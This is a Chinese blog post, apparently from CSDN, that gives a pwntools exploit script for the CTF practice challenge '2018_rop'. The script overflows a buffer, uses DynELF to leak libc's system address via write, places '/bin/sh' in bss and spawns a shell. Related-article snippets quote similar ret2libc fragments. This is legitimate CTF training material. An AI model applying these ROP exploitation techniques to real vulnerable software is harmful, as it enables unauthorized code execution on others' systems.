铁人三项(第五赛区)2018 rop

最新推荐文章于 2024-01-08 12:52:27 发布
最新推荐文章于 2024-01-08 12:52:27 发布
阅读量512 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pondzhang/article/details/106027761
版权 
from pwn import *
p = process('./2018_rop')

gotwrite = 0x0804A010
pltwrite = 0x080483A0
start = 0x080483C0
bss = 0x0804A020
pltread = 0x08048360

def leak(address):
    payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04) 
    p.sendline(payload)
    leakaddress = p.recv(4)
    return leakaddress

d = DynELF(leak, elf=ELF('./2018_rop'))
system_addr = d.lookup('system', 'libc')
payload = 'a' * 140 + p32(pltread) + p32(start) + p32(0) + p32(bss) + p32(8)
p.send(payload)
p.send("/bin/sh\0")
payload = 'a' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(bss)
p.sendline(payload)
p.interactive()
「已注销」
关注
专栏目录
rop轻松谈.pdf
10-21
ROP輕鬆談 ROP(Return Oriented Programming)是一種exploit技术,該技術通過在程式碼中注入惡意代碼,控制程式的執行流程,達到攻擊的目的。本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow...
Buuctf之2018_rop
qq_53809201的博客
01-01 191
经过在ida中搜索,发现既没有system函数也没有bin/sh字符串,所以要想办法泄露出libc函数的地址来得到libc版本,找到system函数和bin/sh地址偏移.发现main函数中调用了两个函数。在第二个调用函数中发现了溢出点.
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 7万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
【BUUCTFPWN】铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 355
【BUUCTFPWN】铁人三项(第五赛区)_2018_rop题解
BUUCTF--铁人三项(第五赛区)_2018_rop1
最新发布
qq_30528603的博客
01-08 558
我这是打本地的代码,远程的话给了libc用libc,没给libc用LibcSearcher,个人感觉不太好用,很多时候找不到。漏洞点主要在vulnerable_function()函数中。1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序。2.通过计算算出libc基地址进一步得到system地址。这题是一题标准的rop。3.找到libc中bin/sh的位置。4.第二次布局就是直接布置rop
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop 1(ret2libc3)
空城惜梦的博客
06-04 1147
@[TOC]( [PWN] BUUCTF 铁人三项(第五赛区)_2018_rop)
rop开放平台
04-12
ROP(Return-Oriented Programming,返回导向编程)是一种高级的代码注入技术,广泛应用于软件安全领域,特别是针对那些启用了地址空间布局随机化(ASLR)但仍存在缓冲区溢出漏洞的程序。ROP允许攻击者在没有直接...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
idarop:IDA的ROP数据库插件
05-15
Idarop:IDA的ROP数据库插件 Idarop是一个IDA插件,它列出并存储打开的二进制文件中存在的所有ROP小工具。 该代码库是从未维护的IDA插件复制而来的。 但是, idasploiter旨在在运行时运行(提升IDA调试器API),而...
rop demo完整用例
07-16
**ROP(Return-Oriented Programming)技术详解及实践** ROP,即Return-Oriented Programming,是一种高级的利用技术,主要用于绕过数据执行保护机制(如DEP,Data Execution Prevention)。在现代操作系统中,为了...
中文UML建模工具Trufun Plato 2005.rar
06-03
中文UML建模工具Trufun Plato 2005.rar
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 720
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
[PWN]铁人三项(第五赛区)_2018_rop
LDX的博客
11-27 243
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop
BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop
餐桌上的猫
03-25 116
exp from pwn import* from LibcSearcher import * elf=ELF('/home/lhb/桌面/2018_rop') p=remote('node4.buuoj.cn',26218) main=0x80484C6 write_plt=elf.plt['write'] write_got=elf.got['write'] payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p3
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 235
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
铁人三项(第五赛区)_2018_rop
Lt95625142的博客
08-25 126
大概就是,0x88+0x04进行栈溢出覆盖返回地址,然后重新载入main函数,接下来利用write函数的三个参数传入信息(这里建议查看一下write函数的三个参数意义,最后一位因为是32位,所以大小是4)看到开了有一个可以写入的函数,然后会输出一些东西,同时在f12之后也没有看到和system以及bin/sh有关的东西。p1过程为了获得write_addr的过程,这里涉及到了延迟绑定机制,注意,这里是32位的程序,和64位先读入寄存器的方式有一点区别。(主要还是针对新手在写,尽量写的详细一点吧)
【CTF】 2018_rop
凉水的博客
06-17 467
2018_rop
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 362
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 165
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值